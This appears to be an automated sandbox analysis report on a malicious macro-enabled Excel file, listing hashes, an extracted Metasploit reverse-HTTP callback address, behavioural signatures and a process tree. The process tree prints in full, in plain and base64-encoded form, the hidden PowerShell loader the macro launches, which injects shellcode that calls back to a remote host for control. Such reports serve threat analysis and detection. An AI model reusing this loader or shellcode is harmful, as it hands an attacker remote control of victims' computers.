Analysis
-
max time kernel
138s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
07-12-2024 22:00
Behavioral task
behavioral1
Sample
5d5b8308cb4e2b8953d0ae655fbf3280831791c6aab585baaffac755edccda2b.xlsm
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
5d5b8308cb4e2b8953d0ae655fbf3280831791c6aab585baaffac755edccda2b.xlsm
Resource
win10v2004-20241007-en
General
-
Target
5d5b8308cb4e2b8953d0ae655fbf3280831791c6aab585baaffac755edccda2b.xlsm
-
Size
84KB
-
MD5
c03a7136157d7368cc6593e7123400d3
-
SHA1
da6a164c4aabbf2f650ef04a40921ebdc32f1fbe
-
SHA256
5d5b8308cb4e2b8953d0ae655fbf3280831791c6aab585baaffac755edccda2b
-
SHA512
290ccf748d6f74ce0c25d5440f2f0e98fac76e8b99edb81c49c547030e95f1da98217a430ab79e21186381c0e3e2be9a7e112d5d038b96ba587b6f594cad01ee
-
SSDEEP
1536:ZBgfmM2qygswi7+nVWQ0hF6Rlykl+/6bFLWxRr+jikaS8FzZBlRFJM6kbm5O:wHzZziMVPkKyO+CJQ+jikaS8zJiaO
Malware Config
Extracted
metasploit
windows/reverse_http
http://192.168.100.13:44863/96KM-ROoWJ5n6GbpAMFcbQ-spvwPN
Signatures
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Metasploit family
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2088 3964 powershell.exe 82 -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2088 powershell.exe -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3964 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2088 powershell.exe 2088 powershell.exe 640 powershell.exe 640 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2088 powershell.exe Token: SeDebugPrivilege 640 powershell.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 3964 EXCEL.EXE 3964 EXCEL.EXE 3964 EXCEL.EXE 3964 EXCEL.EXE 3964 EXCEL.EXE 3964 EXCEL.EXE 3964 EXCEL.EXE 3964 EXCEL.EXE 3964 EXCEL.EXE 3964 EXCEL.EXE 3964 EXCEL.EXE 3964 EXCEL.EXE -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 3964 wrote to memory of 2088 3964 EXCEL.EXE 87 PID 3964 wrote to memory of 2088 3964 EXCEL.EXE 87 PID 2088 wrote to memory of 640 2088 powershell.exe 89 PID 2088 wrote to memory of 640 2088 powershell.exe 89 PID 2088 wrote to memory of 640 2088 powershell.exe 89 PID 640 wrote to memory of 2228 640 powershell.exe 90 PID 640 wrote to memory of 2228 640 powershell.exe 90 PID 640 wrote to memory of 2228 640 powershell.exe 90 PID 2228 wrote to memory of 4864 2228 csc.exe 92 PID 2228 wrote to memory of 4864 2228 csc.exe 92 PID 2228 wrote to memory of 4864 2228 csc.exe 92
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\5d5b8308cb4e2b8953d0ae655fbf3280831791c6aab585baaffac755edccda2b.xlsm"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3964 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoE -NoP -NonI -W Hidden -E $ 1   =   ' $ c   =   ' ' [ D l l I m p o r t ( " k e r n e l 3 2 . d l l " ) ] p u b l i c   s t a t i c   e x t e r n   I n t P t r   V i r t u a l A l l o c ( I n t P t r   l p A d d r e s s ,   u i n t   d w S i z e ,   u i n t   f l A l l o c a t i o n T y p e ,   u i n t   f l P r o t e c t ) ; [ D l l I m p o r t ( " k e r n e l 3 2 . d l l " ) ] p u b l i c   s t a t i c   e x t e r n   I n t P t r   C r e a t e T h r e a d ( I n t P t r   l p T h r e a d A t t r i b u t e s ,   u i n t   d w S t a c k S i z e ,   I n t P t r   l p S t a r t A d d r e s s ,   I n t P t r   l p P a r a m e t e r ,   u i n t   d w C r e a t i o n F l a g s ,   I n t P t r   l p T h r e a d I d ) ; [ D l l I m p o r t ( " m s v c r t . d l l " ) ] p u b l i c   s t a t i c   e x t e r n   I n t P t r   m e m s e t ( I n t P t r   d e s t ,   u i n t   s r c ,   u i n t   c o u n t ) ; ' ' ; $ w   =   A d d - T y p e   - m e m b e r D e f i n i t i o n   $ c   - N a m e   " W i n 3 2 "   - n a m e s p a c e   W i n 3 2 F u n c t i o n s   - p a s s t h r u ; [ B y t e [ ] ] ; [ B y t e [ ] ] $ s c   =   0 x f c , 0 x e 8 , 0 x 8 f , 0 x 0 0 , 0 x 0 0 , 0 x 0 0 , 0 x 6 0 , 0 x 3 1 , 0 x d 2 , 0 x 8 9 , 0 x e 5 , 0 x 6 4 , 0 x 8 b , 0 x 5 2 , 0 x 3 0 , 0 x 8 b , 0 x 5 2 , 0 x 0 c , 0 x 8 b , 0 x 5 2 , 0 x 1 4 , 0 x 3 1 , 0 x f f , 0 x 8 b , 0 x 7 2 , 0 x 2 8 , 0 x 0 f , 0 x b 7 , 0 x 4 a , 0 x 2 6 , 0 x 3 1 , 0 x c 0 , 0 x a c , 0 x 3 c , 0 x 6 1 , 0 x 7 c , 0 x 0 2 , 0 x 2 c , 0 x 2 0 , 0 x c 1 , 0 x c f , 0 x 0 d , 0 x 0 1 , 0 x c 7 , 0 x 4 9 , 0 x 7 5 , 0 x e f , 0 x 5 2 , 0 x 5 7 , 0 x 8 b , 0 x 5 2 , 0 x 1 0 , 0 x 8 b , 0 x 4 2 , 0 x 3 c , 0 x 0 1 , 0 x d 0 , 0 x 8 b , 0 x 4 0 , 0 x 7 8 , 0 x 8 5 , 0 x c 0 , 0 x 7 4 , 0 x 4 c , 0 x 0 1 , 0 x d 0 , 0 x 8 b , 0 x 4 8 , 0 x 1 8 , 0 x 5 0 , 0 x 8 b , 0 x 5 8 , 0 x 2 0 , 0 x 0 1 , 0 x d 3 , 0 x 8 5 , 0 x c 9 , 0 x 7 4 , 0 x 3 c , 0 x 3 1 , 0 x f f , 0 x 4 9 , 0 x 8 b , 0 x 3 4 , 0 x 8 b , 0 x 0 1 , 0 x d 6 , 0 x 3 1 , 0 x c 0 , 0 x a c , 0 x c 1 , 0 x c f , 0 x 0 d , 0 x 0 1 , 0 x c 7 , 0 x 3 8 , 0 x e 0 , 0 x 7 5 , 0 x f 4 , 0 x 0 3 , 0 x 7 d , 0 x f 8 , 0 x 3 b , 0 x 7 d , 0 x 2 4 , 0 x 7 5 , 0 x e 0 , 0 x 5 8 , 0 x 8 b , 0 x 5 8 , 0 x 2 4 , 0 x 0 1 , 0 x d 3 , 0 x 6 6 , 0 x 8 b , 0 x 0 c , 0 x 4 b , 0 x 8 b , 0 x 5 8 , 0 x 1 c , 0 x 0 1 , 0 x d 3 , 0 x 8 b , 0 x 0 4 , 0 x 8 b , 0 x 0 1 , 0 x d 0 , 0 x 8 9 , 0 x 4 4 , 0 x 2 4 , 0 x 2 4 , 0 x 5 b , 0 x 5 b , 0 x 6 1 , 0 x 5 9 , 0 x 5 a , 0 x 5 1 , 0 x f f , 0 x e 0 , 0 x 5 8 , 0 x 5 f , 0 x 5 a , 0 x 8 b , 0 x 1 2 , 0 x e 9 , 0 x 8 0 , 0 x f f , 0 x f f , 0 x f f , 0 x 5 d , 0 x 6 8 , 0 x 6 e , 0 x 6 5 , 0 x 7 4 , 0 x 0 0 , 0 x 6 8 , 0 x 7 7 , 0 x 6 9 , 0 x 6 e , 0 x 6 9 , 0 x 5 4 , 0 x 6 8 , 0 x 4 c , 0 x 7 7 , 0 x 2 6 , 0 x 0 7 , 0 x f f , 0 x d 5 , 0 x 3 1 , 0 x d b , 0 x 5 3 , 0 x 5 3 , 0 x 5 3 , 0 x 5 3 , 0 x 5 3 , 0 x 6 8 , 0 x 3 a , 0 x 5 6 , 0 x 7 9 , 0 x a 7 , 0 x f f , 0 x d 5 , 0 x 5 3 , 0 x 5 3 , 0 x 6 a , 0 x 0 3 , 0 x 5 3 , 0 x 5 3 , 0 x 6 8 , 0 x 3 f , 0 x a f , 0 x 0 0 , 0 x 0 0 , 0 x e 8 , 0 x b 0 , 0 x 0 0 , 0 x 0 0 , 0 x 0 0 , 0 x 2 f , 0 x 3 9 , 0 x 3 6 , 0 x 4 b , 0 x 4 d , 0 x 2 d , 0 x 5 2 , 0 x 4 f , 0 x 6 f , 0 x 5 7 , 0 x 4 a , 0 x 3 5 , 0 x 6 e , 0 x 3 6 , 0 x 4 7 , 0 x 6 2 , 0 x 7 0 , 0 x 4 1 , 0 x 4 d , 0 x 4 6 , 0 x 6 3 , 0 x 6 2 , 0 x 5 1 , 0 x 2 d , 0 x 7 3 , 0 x 7 0 , 0 x 7 6 , 0 x 7 7 , 0 x 5 0 , 0 x 4 e , 0 x 0 0 , 0 x 5 0 , 0 x 6 8 , 0 x 5 7 , 0 x 8 9 , 0 x 9 f , 0 x c 6 , 0 x f f , 0 x d 5 , 0 x 8 9 , 0 x c 6 , 0 x 5 3 , 0 x 6 8 , 0 x 0 0 , 0 x 3 2 , 0 x e 8 , 0 x 8 4 , 0 x 5 3 , 0 x 5 3 , 0 x 5 3 , 0 x 5 7 , 0 x 5 3 , 0 x 5 6 , 0 x 6 8 , 0 x e b , 0 x 5 5 , 0 x 2 e , 0 x 3 b , 0 x f f , 0 x d 5 , 0 x 9 6 , 0 x 6 a , 0 x 0 a , 0 x 5 f , 0 x 6 8 , 0 x 8 0 , 0 x 3 3 , 0 x 0 0 , 0 x 0 0 , 0 x 8 9 , 0 x e 0 , 0 x 6 a , 0 x 0 4 , 0 x 5 0 , 0 x 6 a , 0 x 1 f , 0 x 5 6 , 0 x 6 8 , 0 x 7 5 , 0 x 4 6 , 0 x 9 e , 0 x 8 6 , 0 x f f , 0 x d 5 , 0 x 5 3 , 0 x 5 3 , 0 x 5 3 , 0 x 5 3 , 0 x 5 6 , 0 x 6 8 , 0 x 2 d , 0 x 0 6 , 0 x 1 8 , 0 x 7 b , 0 x f f , 0 x d 5 , 0 x 8 5 , 0 x c 0 , 0 x 7 5 , 0 x 1 6 , 0 x 6 8 , 0 x 8 8 , 0 x 1 3 , 0 x 0 0 , 0 x 0 0 , 0 x 6 8 , 0 x 4 4 , 0 x f 0 , 0 x 3 5 , 0 x e 0 , 0 x f f , 0 x d 5 , 0 x 4 f , 0 x 7 5 , 0 x c d , 0 x 6 8 , 0 x f 0 , 0 x b 5 , 0 x a 2 , 0 x 5 6 , 0 x f f , 0 x d 5 , 0 x 6 a , 0 x 4 0 , 0 x 6 8 , 0 x 0 0 , 0 x 1 0 , 0 x 0 0 , 0 x 0 0 , 0 x 6 8 , 0 x 0 0 , 0 x 0 0 , 0 x 4 0 , 0 x 0 0 , 0 x 5 3 , 0 x 6 8 , 0 x 5 8 , 0 x a 4 , 0 x 5 3 , 0 x e 5 , 0 x f f , 0 x d 5 , 0 x 9 3 , 0 x 5 3 , 0 x 5 3 , 0 x 8 9 , 0 x e 7 , 0 x 5 7 , 0 x 6 8 , 0 x 0 0 , 0 x 2 0 , 0 x 0 0 , 0 x 0 0 , 0 x 5 3 , 0 x 5 6 , 0 x 6 8 , 0 x 1 2 , 0 x 9 6 , 0 x 8 9 , 0 x e 2 , 0 x f f , 0 x d 5 , 0 x 8 5 , 0 x c 0 , 0 x 7 4 , 0 x c d , 0 x 8 b , 0 x 0 7 , 0 x 0 1 , 0 x c 3 , 0 x 8 5 , 0 x c 0 , 0 x 7 5 , 0 x e 5 , 0 x 5 8 , 0 x c 3 , 0 x 5 f , 0 x e 8 , 0 x 6 9 , 0 x f f , 0 x f f , 0 x f f , 0 x 3 1 , 0 x 3 9 , 0 x 3 2 , 0 x 2 e , 0 x 3 1 , 0 x 3 6 , 0 x 3 8 , 0 x 2 e , 0 x 3 1 , 0 x 3 0 , 0 x 3 0 , 0 x 2 e , 0 x 3 1 , 0 x 3 3 , 0 x 0 0 ; $ s i z e   =   0 x 1 0 0 0 ; i f   ( $ s c . L e n g t h   - g t   0 x 1 0 0 0 ) { $ s i z e   =   $ s c . L e n g t h } ; $ x = $ w : : V i r t u a l A l l o c ( 0 , 0 x 1 0 0 0 , $ s i z e , 0 x 4 0 ) ; f o r   ( $ i = 0 ; $ i   - l e   ( $ s c . L e n g t h - 1 ) ; $ i + + )   { $ w : : m e m s e t ( [ I n t P t r ] ( $ x . T o I n t 3 2 ( ) + $ i ) ,   $ s c [ $ i ] ,   1 ) } ; $ w : : C r e a t e T h r e a d ( 0 , 0 , $ x , 0 , 0 , 0 ) ; f o r   ( ; ; ) { S t a r t - s l e e p   6 0 } ; ' ; $ g q   =   [ S y s t e m . C o n v e r t ] : : T o B a s e 6 4 S t r i n g ( [ S y s t e m . T e x t . E n c o d i n g ] : : U n i c o d e . G e t B y t e s ( $ 1 ) ) ; i f ( [ I n t P t r ] : : S i z e   - e q   8 ) { $ x 8 6   =   $ e n v : S y s t e m R o o t   +   " \ s y s w o w 6 4 \ W i n d o w s P o w e r S h e l l \ v 1 . 0 \ p o w e r s h e l l " ; $ c m d   =   " - n o p   - n o n i   - e n c   " ; i e x   " &   $ x 8 6   $ c m d   $ g q " } e l s e { $ c m d   =   " - n o p   - n o n i   - e n c " ; i e x   " &   p o w e r s h e l l   $ c m d   $ g q " ; } 2⤵
- Process spawned unexpected child process
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2088 -
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABjACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAYwAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJABzAGMAIAA9ACAAMAB4AGYAYwAsADAAeABlADgALAAwAHgAOABmACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADYAMAAsADAAeAAzADEALAAwAHgAZAAyACwAMAB4ADgAOQAsADAAeABlADUALAAwAHgANgA0ACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMwAwACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMABjACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMQA0ACwAMAB4ADMAMQAsADAAeABmAGYALAAwAHgAOABiACwAMAB4ADcAMgAsADAAeAAyADgALAAwAHgAMABmACwAMAB4AGIANwAsADAAeAA0AGEALAAwAHgAMgA2ACwAMAB4ADMAMQAsADAAeABjADAALAAwAHgAYQBjACwAMAB4ADMAYwAsADAAeAA2ADEALAAwAHgANwBjACwAMAB4ADAAMgAsADAAeAAyAGMALAAwAHgAMgAwACwAMAB4AGMAMQAsADAAeABjAGYALAAwAHgAMABkACwAMAB4ADAAMQAsADAAeABjADcALAAwAHgANAA5ACwAMAB4ADcANQAsADAAeABlAGYALAAwAHgANQAyACwAMAB4ADUANwAsADAAeAA4AGIALAAwAHgANQAyACwAMAB4ADEAMAAsADAAeAA4AGIALAAwAHgANAAyACwAMAB4ADMAYwAsADAAeAAwADEALAAwAHgAZAAwACwAMAB4ADgAYgAsADAAeAA0ADAALAAwAHgANwA4ACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA0ACwAMAB4ADQAYwAsADAAeAAwADEALAAwAHgAZAAwACwAMAB4ADgAYgAsADAAeAA0ADgALAAwAHgAMQA4ACwAMAB4ADUAMAAsADAAeAA4AGIALAAwAHgANQA4ACwAMAB4ADIAMAAsADAAeAAwADEALAAwAHgAZAAzACwAMAB4ADgANQAsADAAeABjADkALAAwAHgANwA0ACwAMAB4ADMAYwAsADAAeAAzADEALAAwAHgAZgBmACwAMAB4ADQAOQAsADAAeAA4AGIALAAwAHgAMwA0ACwAMAB4ADgAYgAsADAAeAAwADEALAAwAHgAZAA2ACwAMAB4ADMAMQAsADAAeABjADAALAAwAHgAYQBjACwAMAB4AGMAMQAsADAAeABjAGYALAAwAHgAMABkACwAMAB4ADAAMQAsADAAeABjADcALAAwAHgAMwA4ACwAMAB4AGUAMAAsADAAeAA3ADUALAAwAHgAZgA0ACwAMAB4ADAAMwAsADAAeAA3AGQALAAwAHgAZgA4ACwAMAB4ADMAYgAsADAAeAA3AGQALAAwAHgAMgA0ACwAMAB4ADcANQAsADAAeABlADAALAAwAHgANQA4ACwAMAB4ADgAYgAsADAAeAA1ADgALAAwAHgAMgA0ACwAMAB4ADAAMQAsADAAeABkADMALAAwAHgANgA2ACwAMAB4ADgAYgAsADAAeAAwAGMALAAwAHgANABiACwAMAB4ADgAYgAsADAAeAA1ADgALAAwAHgAMQBjACwAMAB4ADAAMQAsADAAeABkADMALAAwAHgAOABiACwAMAB4ADAANAAsADAAeAA4AGIALAAwAHgAMAAxACwAMAB4AGQAMAAsADAAeAA4ADkALAAwAHgANAA0ACwAMAB4ADIANAAsADAAeAAyADQALAAwAHgANQBiACwAMAB4ADUAYgAsADAAeAA2ADEALAAwAHgANQA5ACwAMAB4ADUAYQAsADAAeAA1ADEALAAwAHgAZgBmACwAMAB4AGUAMAAsADAAeAA1ADgALAAwAHgANQBmACwAMAB4ADUAYQAsADAAeAA4AGIALAAwAHgAMQAyACwAMAB4AGUAOQAsADAAeAA4ADAALAAwAHgAZgBmACwAMAB4AGYAZgAsADAAeABmAGYALAAwAHgANQBkACwAMAB4ADYAOAAsADAAeAA2AGUALAAwAHgANgA1ACwAMAB4ADcANAAsADAAeAAwADAALAAwAHgANgA4ACwAMAB4ADcANwAsADAAeAA2ADkALAAwAHgANgBlACwAMAB4ADYAOQAsADAAeAA1ADQALAAwAHgANgA4ACwAMAB4ADQAYwAsADAAeAA3ADcALAAwAHgAMgA2ACwAMAB4ADAANwAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADMAMQAsADAAeABkAGIALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA2ADgALAAwAHgAMwBhACwAMAB4ADUANgAsADAAeAA3ADkALAAwAHgAYQA3ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA2AGEALAAwAHgAMAAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANgA4ACwAMAB4ADMAZgAsADAAeABhAGYALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeABlADgALAAwAHgAYgAwACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADIAZgAsADAAeAAzADkALAAwAHgAMwA2ACwAMAB4ADQAYgAsADAAeAA0AGQALAAwAHgAMgBkACwAMAB4ADUAMgAsADAAeAA0AGYALAAwAHgANgBmACwAMAB4ADUANwAsADAAeAA0AGEALAAwAHgAMwA1ACwAMAB4ADYAZQAsADAAeAAzADYALAAwAHgANAA3ACwAMAB4ADYAMgAsADAAeAA3ADAALAAwAHgANAAxACwAMAB4ADQAZAAsADAAeAA0ADYALAAwAHgANgAzACwAMAB4ADYAMgAsADAAeAA1ADEALAAwAHgAMgBkACwAMAB4ADcAMwAsADAAeAA3ADAALAAwAHgANwA2ACwAMAB4ADcANwAsADAAeAA1ADAALAAwAHgANABlACwAMAB4ADAAMAAsADAAeAA1ADAALAAwAHgANgA4ACwAMAB4ADUANwAsADAAeAA4ADkALAAwAHgAOQBmACwAMAB4AGMANgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADgAOQAsADAAeABjADYALAAwAHgANQAzACwAMAB4ADYAOAAsADAAeAAwADAALAAwAHgAMwAyACwAMAB4AGUAOAAsADAAeAA4ADQALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQA3ACwAMAB4ADUAMwAsADAAeAA1ADYALAAwAHgANgA4ACwAMAB4AGUAYgAsADAAeAA1ADUALAAwAHgAMgBlACwAMAB4ADMAYgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADkANgAsADAAeAA2AGEALAAwAHgAMABhACwAMAB4ADUAZgAsADAAeAA2ADgALAAwAHgAOAAwACwAMAB4ADMAMwAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADgAOQAsADAAeABlADAALAAwAHgANgBhACwAMAB4ADAANAAsADAAeAA1ADAALAAwAHgANgBhACwAMAB4ADEAZgAsADAAeAA1ADYALAAwAHgANgA4ACwAMAB4ADcANQAsADAAeAA0ADYALAAwAHgAOQBlACwAMAB4ADgANgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADYALAAwAHgANgA4ACwAMAB4ADIAZAAsADAAeAAwADYALAAwAHgAMQA4ACwAMAB4ADcAYgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA1ACwAMAB4ADEANgAsADAAeAA2ADgALAAwAHgAOAA4ACwAMAB4ADEAMwAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADYAOAAsADAAeAA0ADQALAAwAHgAZgAwACwAMAB4ADMANQAsADAAeABlADAALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA0AGYALAAwAHgANwA1ACwAMAB4AGMAZAAsADAAeAA2ADgALAAwAHgAZgAwACwAMAB4AGIANQAsADAAeABhADIALAAwAHgANQA2ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgANgBhACwAMAB4ADQAMAAsADAAeAA2ADgALAAwAHgAMAAwACwAMAB4ADEAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADYAOAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADQAMAAsADAAeAAwADAALAAwAHgANQAzACwAMAB4ADYAOAAsADAAeAA1ADgALAAwAHgAYQA0ACwAMAB4ADUAMwAsADAAeABlADUALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA5ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA4ADkALAAwAHgAZQA3ACwAMAB4ADUANwAsADAAeAA2ADgALAAwAHgAMAAwACwAMAB4ADIAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADUAMwAsADAAeAA1ADYALAAwAHgANgA4ACwAMAB4ADEAMgAsADAAeAA5ADYALAAwAHgAOAA5ACwAMAB4AGUAMgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA0ACwAMAB4AGMAZAAsADAAeAA4AGIALAAwAHgAMAA3ACwAMAB4ADAAMQAsADAAeABjADMALAAwAHgAOAA1ACwAMAB4AGMAMAAsADAAeAA3ADUALAAwAHgAZQA1ACwAMAB4ADUAOAAsADAAeABjADMALAAwAHgANQBmACwAMAB4AGUAOAAsADAAeAA2ADkALAAwAHgAZgBmACwAMAB4AGYAZgAsADAAeABmAGYALAAwAHgAMwAxACwAMAB4ADMAOQAsADAAeAAzADIALAAwAHgAMgBlACwAMAB4ADMAMQAsADAAeAAzADYALAAwAHgAMwA4ACwAMAB4ADIAZQAsADAAeAAzADEALAAwAHgAMwAwACwAMAB4ADMAMAAsADAAeAAyAGUALAAwAHgAMwAxACwAMAB4ADMAMwAsADAAeAAwADAAOwAkAHMAaQB6AGUAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAcwBjAC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAHMAaQB6AGUAIAA9ACAAJABzAGMALgBMAGUAbgBnAHQAaAB9ADsAJAB4AD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAcwBpAHoAZQAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAcwBjAC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAHgALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHMAYwBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAeAAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwA=3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:640 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\db3trqxe\db3trqxe.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2228 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBCC8.tmp" "c:\Users\Admin\AppData\Local\Temp\db3trqxe\CSC95D4F2F52C83438194D63B52B47F7F2.TMP"5⤵
